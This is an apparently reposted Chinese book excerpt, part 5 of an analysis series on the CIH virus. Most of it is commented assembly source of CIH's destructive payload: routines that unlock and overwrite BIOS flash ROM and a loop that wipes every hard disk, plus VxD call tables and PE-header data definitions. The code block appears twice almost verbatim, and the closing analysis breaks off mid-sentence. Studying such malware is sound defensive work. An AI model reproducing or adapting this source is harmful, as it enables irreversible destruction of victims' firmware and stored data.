病毒程序源码实例剖析-CIH病毒[5]
来源:互联网 发布:sql server2000安装包 编辑:程序博客网 时间:2024/06/07 07:10
push ecx
loop $
;破坏BIOS中额外的000E0000 - 000E007F段的 ROM数据 ,共80h个字节
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; 显示和激活BIOS的000E0000 - 000FFFFF段数据,共128 KB,该段可写入信息mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; 破坏BIOS的000FE000 - 000FE07F段数据,共80h字节
mov ah, 0e0h
mov [eax], al
; 隐藏BIOS的000F0000 - 000FFFFF段,共64 KB
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi
; 破坏所有硬盘
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
;循环进行破坏
LoopOfKillHardDisk:
int 20h
dd 00100004h
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
;换下一个硬盘
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
;破坏下一个区域
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
;使EEPROM能够写入信息
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
IOForEEPROM:
@10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
ret
;静态数据定义
LastVxdCallAddress = IFSMgr_Ring0_FileIO ;最后一个调用的Vxd指令地址
VxdCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath ;各个Vxd调用指令地址之差
VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;Vxd的调用号
VxdCallTableSize = ($-VxdCallIDTable)/04h ;程序 中使用Vxd调用的个数
;病毒版本和版权信息定义
VirusVersionCopyright db 'CIH v' ;CIH病毒的标识
db MajorVirusVersion+'0' ;主版本号
db '.'
db MinorVirusVersion+'0' ;次版本号
db ' TATUNG' ;作者名字
;病毒 大小
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections*SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)
;动态数据定义
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ;病毒数据起始地址
OnBusy db 0 ;“忙”标志
FileModificationTime dd ? ;文件修改时间
FileNameBuffer db FileNameBufferSize dup(?) ;7fh长的文件名缓冲区
@7 = FileNameBuffer
DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; 块数目
TimeDateStamp dd ? ; 文件时间
SymbolsPointer dd ?
NumberOfSymbols dd ? ; 符号表中符号个数
SizeOfOptionalHeader dw ? ;可选文件头的长度
_Characteristics dw ? ;字符集标志
Magic dw ? ;标志字(总是010bh)
LinkerVersion dw ? ;连接器版本号
SizeOfCode dd ? ;代码 段大小
SizeOfInitializedData dd ? ;已初始化数据块大小
SizeOfUninitializedData dd ? ;未初始化数据块大小
AddressOfEntryPoint dd ? ;程序起始RVA
BaseOfCode dd ? ;代码段起始RVA
BaseOfData dd ? ;数据段起始RVA
ImageBase dd ? ;装入基址RVA
@9 = $
SectionAlignment dd ? ;块对齐
FileAlignment dd ? ;文件块对齐
OperatingSystemVersion dd ? ;所需操作系统版本号
ImageVersion dd ? ;用户自定义版本号
SubsystemVersion dd ? ;所需子系统版本号
Reserved dd ? ; 保留
SizeOfImage dd ? ; 文件各部分总长
SizeOfHeaders dd ? ;文件头大小
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = @9
SectionName = StartOfSectionTable ;块名
VirtualSize = StartOfSectionTable+08h ;段真实长度
VirtualAddress = StartOfSectionTable+0ch ;块的RVA
SizeOfRawData = StartOfSectionTable+10h ; 块物理长度
PointerToRawData = StartOfSectionTable+14h ; 块物理偏移
PointerToRelocations = StartOfSectionTable+18h ; 重定位的偏移
PointerToLineNumbers = StartOfSectionTable+1ch ; 行号表的偏移
NumberOfRelocations = StartOfSectionTable+20h ; 重定位项数目
NumberOfLinenNmbers = StartOfSectionTable+22h ; 行号表的数目
Characteristics = StartOfSectionTable+24h ; 块属性
SizeOfScetionTable = Characteristics+04h-SectionName ; 每块表项的长度
;病毒所需要的内存数量
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $
VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
;病毒程序结束
VirusGame ENDS
END FileHeader
loop $
;破坏BIOS中额外的000E0000 - 000E007F段的 ROM
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; 显示和激活BIOS的000E0000 - 000FFFFF段数据,共128 KB,该段可写入信息mov eax, 0f5555h
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; 破坏BIOS的000FE000 - 000FE07F段数据,共80h字节
mov ah, 0e0h
mov [eax], al
; 隐藏BIOS的000F0000 - 000FFFFF段,共64 KB
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi
; 破坏所有硬盘
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
;循环进行破坏
LoopOfKillHardDisk:
int 20h
dd 00100004h
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
;换下一个硬盘
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
;破坏下一个区域
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
;使EEPROM能够写入
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
IOForEEPROM:
@10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
ret
;静态数据定义
LastVxdCallAddress = IFSMgr_Ring0_FileIO ;最后一个调用的Vxd指令地址
VxdCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath ;各个Vxd调用指令地址之差
VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;Vxd的调用号
VxdCallTableSize = ($-VxdCallIDTable)/04h ;
;病毒版本和版权信息定义
VirusVersionCopyright db 'CIH v' ;CIH病毒的标识
db MajorVirusVersion+'0' ;主版本号
db '.'
db MinorVirusVersion+'0' ;次版本号
db ' TATUNG' ;作者名字
;
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections*SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)
;动态数据定义
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ;病毒数据起始地址
OnBusy db 0 ;“忙”标志
FileModificationTime dd ? ;文件修改
FileNameBuffer db FileNameBufferSize dup(?) ;7fh长的文件名缓冲区
@7 = FileNameBuffer
DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; 块数目
TimeDateStamp dd ? ; 文件时间
SymbolsPointer dd ?
NumberOfSymbols dd ? ; 符号表中符号个数
SizeOfOptionalHeader dw ? ;可选文件头的长度
_Characteristics dw ? ;字符集
Magic dw ? ;标志字(总是010bh)
LinkerVersion dw ? ;连接器版本号
SizeOfCode dd ? ;
SizeOfInitializedData dd ? ;已初始化数据块大小
SizeOfUninitializedData dd ? ;未初始化数据块大小
AddressOfEntryPoint dd ? ;程序起始RVA
BaseOfCode dd ? ;代码段起始RVA
BaseOfData dd ? ;数据段起始RVA
ImageBase dd ? ;装入基址RVA
@9 = $
SectionAlignment dd ? ;块对齐
FileAlignment dd ? ;文件块对齐
OperatingSystemVersion dd ? ;所需操作系统版本号
ImageVersion dd ? ;用户自定义版本号
SubsystemVersion dd ? ;所需子系统版本号
Reserved dd ? ; 保留
SizeOfImage dd ? ; 文件各部分总长
SizeOfHeaders dd ? ;文件头大小
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = @9
SectionName = StartOfSectionTable ;块名
VirtualSize = StartOfSectionTable+08h ;段真实长度
VirtualAddress = StartOfSectionTable+0ch ;块的RVA
SizeOfRawData = StartOfSectionTable+10h ; 块物理长度
PointerToRawData = StartOfSectionTable+14h ; 块物理偏移
PointerToRelocations = StartOfSectionTable+18h ; 重定位的偏移
PointerToLineNumbers = StartOfSectionTable+1ch ; 行号表的偏移
NumberOfRelocations = StartOfSectionTable+20h ; 重定位项数目
NumberOfLinenNmbers = StartOfSectionTable+22h ; 行号表的数目
Characteristics = StartOfSectionTable+24h ; 块属性
SizeOfScetionTable = Characteristics+04h-SectionName ; 每块表项的长度
;病毒所需要的内存
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $
VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
;病毒程序结束
VirusGame ENDS
END FileHeader
从以上代码分析过程中,我们可以看出,CIH病毒结构清晰,层次分明。该病毒程序的主干结构与DOS病毒极其相似,只不过对病毒细节的处理都是按win95方法,全部系统调用都是采用Vxd。这样做使病毒程序更加底层、效率更高,也便于编程,与用Windows下的API函数相比,无须考虑病毒自身的复杂重定位过程;与使用中断相比,又更能防止对程序的跟踪分析。
CIH病毒有两个
出于
此文章节选自《计算机病毒与木马程序剖析》http://shop.csai.cn/itbook/itbookinfo.asp?lbbh=BD05647383
- 病毒程序源码实例剖析-CIH病毒[5]
- 病毒程序源码实例剖析-CIH病毒[1]
- 病毒程序源码实例剖析-CIH病毒[2]
- 病毒程序源码实例剖析-CIH病毒[3]
- 病毒程序源码实例剖析-CIH病毒[4]
- 病毒程序源码实例剖析-“主页”病毒[1]
- 病毒程序源码实例剖析-“主页”病毒[2]
- CIH病毒
- 高手写的天书程序-CIH病毒源码
- CIH病毒原码
- cih病毒分析[转]
- CIH病毒庐山真面目
- CIH病毒源代码
- 6.4 病毒实例剖析
- CIH病毒1.4版本之中文注释
- CIH病毒1.4版本之中文注释
- CIH病毒1.4版本之中文注释
- CIH病毒1.4版本之中文注释
- 病毒程序源码实例剖析-CIH病毒[2]
- 为你的MySQL数据库加铸23道安全门
- 病毒程序源码实例剖析-CIH病毒[3]
- 教你怎样在两台MySQL数据库间实现同步
- 病毒程序源码实例剖析-CIH病毒[4]
- 病毒程序源码实例剖析-CIH病毒[5]
- 搜索引擎的分页读取及索引的建立
- php采用数据库保存session
- csdn搞什么,左边没了。
- C# 范型编程
- 最简单快速的apache二级域名实现方法
- 本文为你介绍MySQL中九条鲜为人知的技巧。
- 2006年度中国上市公司价值百强排名表前100强
- mysql技巧总结